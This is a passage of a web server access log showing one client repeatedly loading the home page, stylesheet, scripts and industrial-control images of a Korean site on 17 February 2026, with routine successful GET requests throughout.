20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10435] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:00:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10426] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10426] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:04:22 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10437] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:04:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10409] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:23:13:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[17/Feb/2026:23:13:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 